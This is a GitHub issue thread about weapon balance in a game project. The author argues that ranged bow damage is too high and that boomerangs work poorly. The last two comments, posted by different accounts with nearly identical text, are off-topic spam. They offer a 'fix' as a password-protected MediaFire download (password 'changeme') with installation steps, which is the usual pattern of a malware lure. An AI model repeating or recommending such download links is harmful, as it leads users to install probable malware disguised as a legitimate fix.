### ISSUE TITLE
Decrease ranged damage for players

### ISSUE THREAD

**Issue by Guineapigboyx** [uthw/Mincemeat-2#80]
Those already have a lot of benefits such as having infinite range, but they also can be improved with the ability to shoot out tons of arrows and deal tons of damage easily with some enchantments.

I feel like bows should be committal and basically act like a sniper rifle.

**Comment by Guineapigboyx** [comment]
Also side note that boomerangs also really suck since most of the time they can't come back to you since their code is really weird.

They also usually get out damaged by bows and also outraged.

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
